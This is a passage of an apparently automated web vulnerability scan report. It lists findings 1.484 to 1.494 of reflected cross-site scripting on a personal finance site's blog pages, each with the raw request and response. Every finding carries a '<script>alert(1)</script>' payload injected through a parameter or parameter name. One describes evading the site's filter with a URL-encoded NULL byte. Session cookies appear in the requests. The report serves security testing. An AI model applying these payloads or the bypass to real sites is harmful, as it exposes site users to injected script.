Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1&page=1'>
...[SNIP]...

1.484. http://www.myfinances.com/blog.html [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?%007485b'><script>alert(1)</script>abffe3120a4&page=1'>
...[SNIP]...

1.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'">
...[SNIP]...

1.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'">
...[SNIP]...

1.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'">
...[SNIP]...

1.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'">
...[SNIP]...

1.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'">
...[SNIP]...

1.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'">
...[SNIP]...

1.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'">
...[SNIP]...

1.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'">
...[SNIP]...

1.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'">
...[SNIP]...

1.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'">
...[SNIP]...

